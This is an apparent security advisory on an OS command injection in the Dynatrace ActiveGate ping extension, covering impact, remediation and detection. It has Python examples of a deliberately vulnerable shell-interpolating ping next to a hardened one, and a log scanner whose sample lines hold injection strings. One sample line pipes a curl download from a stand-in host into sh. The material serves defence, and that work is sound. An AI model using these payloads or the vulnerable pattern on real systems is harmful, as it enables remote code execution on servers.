CVE-2025-61304
Dynatrace · Dynatrace ActiveGate ping extension
A critical OS command injection vulnerability, identified as CVE-2025-61304, has been discovered in the Dynatrace ActiveGate ping extension.
Executive summary
CVE-2025-61304 is a critical OS command injection vulnerability in the Dynatrace ActiveGate ping extension. The flaw lets an unauthenticated, remote attacker execute arbitrary commands on the underlying server by submitting a specially crafted IP address to the ping check, which can lead to complete compromise of the ActiveGate host. Given its critical severity (CVSS 9.8), immediate remediation is required to prevent unauthorized access to and control of affected systems.
Vulnerability
This vulnerability is an OS command injection flaw in the ping extension of Dynatrace ActiveGate. The function that performs the ping check takes the IP address supplied by the caller and inserts it into the ping command line without validating it. An attacker can therefore append shell metacharacters (for example ;, |, && or $( )) followed by arbitrary OS commands to the IP address field. When the extension hands that command line to the shell, the injected commands run on the host operating system with the privileges of the ActiveGate service account. Like other command injections, the flaw needs no memory corruption or race condition to exploit: a single crafted string is enough, which is why this class of bug is rated as easy to exploit.
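The pattern behind this class of flaw, as an added example that is not the Dynatrace extension's code: a ping check that interpolates a caller-supplied address into a shell command line, next to a hardened version that allow-lists the value as an IP address and runs ping without a shell. The function names, the marker string and the payload are assumptions for illustration.

```python
import ipaddress
import subprocess

# Added example, not the Dynatrace extension's code. It models the flaw the advisory
# describes (a caller-supplied "IP address" dropped into a shell command line unvalidated)
# next to a hardened version of the same check. MARKER, the payload and the function
# names are assumptions for illustration.

MARKER = "INJECTED"


def run_ping_vulnerable(host: str) -> str:
    """The vulnerable pattern: the untrusted value is interpolated into a shell string
    and run with shell=True, so ; | && $( ) end the ping command and start an
    attacker-chosen one. Returns the stdout of whatever ended up running."""
    cmd = f"ping -c 1 -W 2 {host}"  # no validation of `host`
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=20)
    return proc.stdout


def validate_ip(host: str) -> str:
    """Allow-list check: the value must parse as an IPv4 or IPv6 address. Anything
    else (hostnames, shell metacharacters, leading '-' option injection) is rejected."""
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError:
        raise ValueError(f"refusing to ping non-IP value: {host!r}") from None


def build_ping_argv(host: str) -> list[str]:
    """Hardened form: validate, then build an argv list. With no shell involved the
    value can only ever be one argument to ping, never a second command, and because
    validation guarantees it is an IP literal it cannot be mistaken for an option."""
    return ["ping", "-c", "1", "-W", "2", validate_ip(host)]


def run_ping_hardened(host: str) -> str:
    proc = subprocess.run(build_ping_argv(host), capture_output=True, text=True, timeout=20)
    return proc.stdout


if __name__ == "__main__":
    payload = f"127.0.0.1; echo {MARKER}"  # constructed test payload
    out = run_ping_vulnerable(payload)
    print("vulnerable path ran the injected command:", MARKER in out)
    try:
        run_ping_hardened(payload)
    except ValueError as exc:
        print("hardened path rejected it:", exc)
```

The vulnerable path runs the injected echo whether or not a ping binary is installed, because the shell parses the metacharacter before ping is ever resolved. The hardened path also rejects hostnames; if the extension legitimately needs them, validate against a strict hostname pattern rather than loosening the check, and keep the argv form so the value stays a single argument.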
Business impact
This vulnerability is rated as critical severity with a CVSS score of 9.8. Successful exploitation could lead to a complete compromise of the Dynatrace ActiveGate server. The potential consequences include theft of sensitive monitoring data and credentials, disruption of critical monitoring services, and using the compromised server as a pivot point for lateral movement into the broader corporate network. This poses a significant risk to the confidentiality, integrity, and availability of the organization's IT infrastructure and the data it processes.
Remediation
Immediate Action: Update the Dynatrace ActiveGate ping extension to the latest version available from the vendor, which addresses this vulnerability. After patching, it is crucial to monitor for any signs of post-exploitation activity and review system and application access logs for any indicators of compromise that may have occurred prior to remediation.
Proactive Monitoring: Organizations should actively monitor for exploitation attempts. Review ActiveGate logs and host process-creation logs (auditd execve records on Linux, Sysmon event ID 1 or Security event 4688 on Windows) for ping invocations whose target is not a plain IP address, in particular values containing shell metacharacters or their percent-encoded forms such as %3B. Monitor network traffic for unexpected outbound connections from ActiveGate servers, which could indicate a reverse shell or data exfiltration. Alert on child processes of the ActiveGate service other than ping, such as sh, bash, curl, wget or powershell.
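A detection sweep matching the first recommendation above, as an added example rather than Dynatrace tooling: it pulls the address field out of log lines, percent-decodes it once, and flags values that are not IP addresses, separating those carrying shell metacharacters from other malformed input such as option injection. The key=value line format, the address= field name and the sample lines are constructed assumptions; adapt the field regex to the real ActiveGate log layout.

```python
import ipaddress
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Added example, not Dynatrace code and not a real ActiveGate log format. The
# `address=` field, the line layout and SAMPLE_LOG are constructed assumptions.

# Characters a POSIX shell treats specially; any of them in an "IP address" is a red flag.
SHELL_META = re.compile(r"[;&|`$<>\n\r(){}\\]")
# Field extractor: address="quoted value" or address=bareword.
FIELD = re.compile(r'address=(?:"([^"]*)"|(\S+))')


def extract_address(line: str) -> Optional[str]:
    m = FIELD.search(line)
    if not m:
        return None
    raw = m.group(1) if m.group(1) is not None else m.group(2)
    # Decode once: a payload submitted over HTTP may have been logged percent-encoded.
    return unquote(raw)


def classify(value: str) -> str:
    """'ok' for a syntactically valid IPv4/IPv6 literal; 'metachar' if the value carries
    shell metacharacters; 'malformed' for anything else (hostname, option injection, empty)."""
    try:
        ipaddress.ip_address(value.strip())
        return "ok"
    except ValueError:
        pass
    if SHELL_META.search(value):
        return "metachar"
    return "malformed"


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_no, verdict, decoded_value) for every line whose address is not a clean IP."""
    findings = []
    for n, line in enumerate(lines, 1):
        value = extract_address(line)
        if value is None:
            continue
        verdict = classify(value)
        if verdict != "ok":
            findings.append((n, verdict, value))
    return findings


# Constructed sample lines (not captured from a real system).
SAMPLE_LOG = [
    '2025-10-02 10:15:01 INFO  ping-extension: ping check address=10.0.0.5 result=ok',
    '2025-10-02 10:15:02 INFO  ping-extension: ping check address="10.0.0.5; curl http://198.51.100.7/x | sh" result=error',
    '2025-10-02 10:15:03 INFO  ping-extension: ping check address=10.0.0.5%3Bid result=error',
    '2025-10-02 10:15:04 INFO  ping-extension: ping check address=2001:db8::1 result=ok',
    '2025-10-02 10:15:05 INFO  ping-extension: ping check address=-c%2099999%20127.0.0.1 result=error',
    '2025-10-02 10:15:06 INFO  ping-extension: ping check address="$(id)" result=error',
    '2025-10-02 10:15:07 INFO  ping-extension: heartbeat',
]

if __name__ == "__main__":
    for line_no, verdict, value in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {verdict:9s} {value!r}")
```

If the deployment legitimately pings hostnames, relax the 'malformed' verdict with a strict hostname pattern instead of dropping it: a leading dash or embedded whitespace in the field is still worth an alert, since it points at option injection against ping itself.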
Compensating Controls: If immediate patching is not feasible, consider the following compensating controls:
- Disable or uninstall the ActiveGate ping extension if its functionality is not business-critical.
- Implement strict network segmentation to limit access to the ActiveGate host to only trusted administrative sources.
- Deploy an Intrusion Prevention System (IPS) or Web Application Firewall (WAF) with rules that detect and block command injection patterns in the address field. Treat this as a stopgap only: signature rules are bypassed by encoding and alternative metacharacters, so they do not replace patching.
Exploitation status
Public Exploit Available: False
Analyst recommendation
Given the critical CVSS score of 9.8 and the high potential for complete system compromise, this vulnerability represents a severe and immediate risk to the organization. We strongly recommend that all affected instances of the Dynatrace ActiveGate ping extension be updated to a patched version with the highest priority. The ease of exploitation for this type of flaw means that proactive patching is the only effective long-term mitigation.